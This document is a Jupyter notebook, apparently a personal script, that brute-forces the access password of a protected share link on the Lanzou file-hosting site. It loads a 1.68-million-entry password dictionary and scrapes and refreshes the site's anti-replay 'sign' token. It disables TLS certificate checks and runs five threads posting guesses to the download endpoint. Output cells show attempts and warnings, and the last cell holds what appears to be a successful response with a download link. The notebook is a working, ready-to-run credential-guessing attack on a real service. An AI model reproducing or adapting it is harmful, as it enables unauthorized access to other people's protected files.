In [1]:
import urllib,threading,ssl,time,random,http.cookiejar
ssl._create_default_https_context=ssl._create_unverified_context
import requests
import json
import math
import sys

In [2]:
password=""
pwddict=[]
totpwd=0
srctot=0
proxy = {'https':''}
sign = ""
threadnum = 1
pwdfile = "allpwd.dic"
ignorepwdfile = ""
# url="https://wwta.lanzoub.com/igj5H0hntv5g"
url="https://wwta.lanzoub.com/ikLuO0iwztid"
# url = "https://wwt.lanzoub.com/iFgeg099lwif"
posturl="https://wwta.lanzoub.com/ajaxm.php"
headers = {
    "Host": "wwta.lanzoub.com",
    "Connection": "keep-alive",
    "Content-Length": "111",
    "Accept": "application/json, text/javascript, */*",
    "Sec-Fetch-Dest": "empty",
    "X-Requested-With": "XMLHttpRequest",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "https://wwta.lanzoub.com",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Fetch-Mode": "cors",
    "Referer": "https://wwta.lanzoub.com/i3bmz0mp14wf",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7",
    "Cookie": "codelen=1; ai_user=FWg/iqzvP3hpX3jVbUYNDB|2023-01-03T11:39:57.357Z; pc_ad1=1",
}
def loaddict():
    ignorelist={}
    fp = open(pwdfile, "r")
    for line in fp:
        ignorelist[line.strip('\n')]=0
    fp.close()
    if ignorepwdfile:
        fp = open(ignorepwdfile, "r")
        for line in fp:
            ignorelist[line.strip('\n')]=1
        fp.close()
    for i in ignorelist:
        if ignorelist[i]==0:
            pwddict.append(i)

In [3]:
loaddict()

In [4]:
log = []
with open("log.txt","r") as f:
    lines = f.readlines()
    for line in lines:
        line = line.strip()
        log.append(line)
log = set(log)

In [5]:
temp = []
for x in pwddict:
    if x not in log:
        temp.append(x)
        

In [6]:
pwddict = temp

In [4]:
len(pwddict)

1679616

In [5]:
threadnum=5
pwdGroups = []
length = len(pwddict)
print("密码总数：",length)
password = ""
for i in range(threadnum):
    pwdGroups.append(pwddict[math.floor(i / threadnum * length):math.floor((i + 1) / threadnum * length)])
checkCnt = 0
for i in range(threadnum):
    checkCnt += len(pwdGroups[i])
assert(checkCnt==length)

密码总数： 1679616


In [6]:
def getSign():
    response = requests.get(url,headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.78"},verify=False)
    html = response.content.decode()
    tmp1 = html.find("sign")
    start = html.find("sign",tmp1+1)
    end = html.find("&p=",start)
    return html[start+5:end]

In [7]:
len(pwdGroups[0])

335923

In [8]:
# pwdlock = threading.Lock()
def GetPwd(i):
    cnt = len(pwdGroups[i])
    num=random.randint(0,cnt-1)
    ret=pwdGroups[i][num]
    del pwdGroups[i][num]
    return ret,cnt-1

In [75]:
tryCnt = 0
for i in range(10):
    pwdCnt = len(pwddict)
    print("次数",tryCnt,"密码剩余总数：",pwdCnt)
    num=random.randint(0,pwdCnt)
    trying=pwddict[num]
    print("trying",trying)
    data = {
       "p" : trying,
       "action" : "downprocess",
       "sign" : sign,
    }
    response = requests.post(posturl, data=data,headers=headers,verify=False)
    msg = response.content.decode()
    try:
        msg = json.loads(msg)
    except:
        print("err",msg)
        break
    if msg['inf']!='密码不正确':
        print(msg)
        break
    elif msg['inf']=='已超时，请刷新':
        print(msg)
        getSign()
        continue
    else:
        tryCnt+=1
        del pwddict[num]

次数 0 密码剩余总数： 1678778
trying ah6a


/home/zhiqiang/anaconda3/envs/flare/lib/python3.8/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host 'wwta.lanzoub.com'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(


{'zt': 0, 'dom': 'https://developer.lanzoug.com', 'url': 0, 'inf': '已超时，请刷新'}


In [9]:
f = open("log.txt","a")
sys.stdout = f

In [5]:
sys.stdout = sys.__stdout__

In [6]:
f.close()

In [10]:
def fuck(tid,_):
    global password
    tryCnt = 0
    sign = getSign()
    # while password == "":
    cookie = http.cookiejar.MozillaCookieJar("cookie.txt")
    handler = urllib.request.HTTPCookieProcessor(cookie)
    opener = urllib.request.build_opener(handler)
    while password=="":
        trying,pwdCnt = GetPwd(tid)
        if trying == "":
                break

        data = {
           "p" : trying,
           "action" : "downprocess",
           "sign" : sign,
        }

        while 1:
            
            try:
                request = urllib.request.Request(posturl, headers=headers, data=urllib.parse.urlencode(data).encode())
                response = opener.open(request,timeout=5)
                check=response.read().decode()
                break
            except:
                time.sleep(0.5)

        try:
             msg=json.loads(check)
        except:
            print("err",msg)
            break

        if msg['inf']=='已超时，请刷新':
#             print(,msg)
            sign = getSign()
#             print("线程号",tid,"获取新Sign",sign)
            continue
        elif msg['inf']!='密码不正确':
            print("线程号",tid,msg,trying)
            password = msg
            break
        else:
            print(trying)
#             print(msg)
            tryCnt+=1
#             del pwdDict[num]
            

In [14]:
threading.enumerate()

[<_MainThread(MainThread, started 140395528718144)>,
 <Thread(IOPub, started daemon 140395426543360)>,
 <Heartbeat(Heartbeat, started daemon 140395418150656)>,
 <Thread(Thread-3, started daemon 140395392972544)>,
 <Thread(Thread-4, started daemon 140395384579840)>,
 <ControlThread(Control, started daemon 140395376187136)>,
 <HistorySavingThread(IPythonHistorySavingThread, started 140394897602304)>,
 <ParentPollerUnix(Thread-2, started daemon 140394889209600)>]

In [51]:
threading.current_thread()

<_MainThread(MainThread, started 139877550212928)>

In [20]:
pwdGroups[0] = ["abcd","1234","2345","96tj"]
pwdGroups[1] = ["abcw","1w34","2315","9btj"]
pwdGroups[2] = ["abcz","12g4","2ga5","91tj"]

In [11]:
threadid=[]

from multiprocessing import Process
for i in range(int(threadnum)):
    threadid.append(threading.Thread(target = fuck, args=(i,i)))
#     threadid.append(Process(target = fuck, args=(i,i)))
    threadid[i].start()

/home/zhiqiang/anaconda3/envs/flare/lib/python3.8/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host 'wwta.lanzoub.com'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
/home/zhiqiang/anaconda3/envs/flare/lib/python3.8/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host 'wwta.lanzoub.com'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
/home/zhiqiang/anaconda3/envs/flare/lib/python3.8/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host 'wwta.lanzoub.com'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warning

In [11]:
while 1:
    alive=0
    for i in range(int(threadnum)):
        if threadid[i].isAlive()=="True":
            alive=1
            break
    if password != "":
        print("密码已找到！Password:",password)
        break
    time.sleep(1)

/tmp/ipykernel_878624/1235723267.py:4: DeprecationWarning: isAlive() is deprecated, use is_alive() instead
  if threadid[i].isAlive()=="True":
/home/zhiqiang/anaconda3/envs/flare/lib/python3.8/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host 'wwta.lanzoub.com'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
/home/zhiqiang/anaconda3/envs/flare/lib/python3.8/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host 'wwta.lanzoub.com'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
/home/zhiqiang/anaconda3/envs/flare/lib/python3.8/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host 'wwta.lanzoub.com'

KeyboardInterrupt: 

In [46]:
password

''

/home/zhiqiang/anaconda3/envs/flare/lib/python3.8/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host 'wwta.lanzoub.com'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
/home/zhiqiang/anaconda3/envs/flare/lib/python3.8/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host 'wwta.lanzoub.com'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
/home/zhiqiang/anaconda3/envs/flare/lib/python3.8/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host 'wwta.lanzoub.com'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warning

In [59]:
len(pwdGroups[22])

55986

In [39]:
len(pwdGroups[0])

331419

In [40]:
len(pwdGroups[1])

331453

In [41]:
len(pwdGroups[2])

331443

In [44]:
len(pwdGroups[3])

322794

In [31]:
len(pwdGroups[4])

334006

/home/zhiqiang/anaconda3/envs/flare/lib/python3.8/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host 'wwta.lanzoub.com'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
/home/zhiqiang/anaconda3/envs/flare/lib/python3.8/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host 'wwta.lanzoub.com'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
/home/zhiqiang/anaconda3/envs/flare/lib/python3.8/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host 'wwta.lanzoub.com'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warning

In [ ]:
{
   "dom" : "https://developer.lanzoug.com",
   "inf" : "元宵P1.rar",
   "url" : "?VDJWaFprAzIGDwc/V2IBbVtkBj5V7wuMB4MA4wDyB7MIWAVjDX4GIAQzVnILeQdgVGdTOgA6Al8Bb1U3AGFTY1RkVjFaNANmBmMHY1czATVbJwZlVXkLNAcxADUAaAcxCD0Fag12BiIEIlY9C20HNlQ8U2UAcAIwATRVfABsU2dUe1ZlWjIDYgZnB2FXYAE2W2cGZlU8C2wHMwA/AGUHMwhpBWENNAY3BDNWOAtmBzVUP1NjAD4CNQEwVWoAPVMwVGdWL1p1AzYGIgd3V3YBc1tkBnFVYwttBz0ANABtBzEIMAVqDWIGYwR0VnQLNgdrVGtTMABiAjEBMFVkAGlTa1RhVjlaPwNgBmUHf1ctASZbZwZvVX0LNAcxADAAawczCDEFZw1jBmUEY1YyC3kHc1R+UyEAYgIxATBVZABpU2dUbVY1WjMDYgZgB3dXdgFpW3EGPlU4CzsHMwAoAGsHMggmBWENZAZ8BGpWNQ==",
   "zt" : 1
}
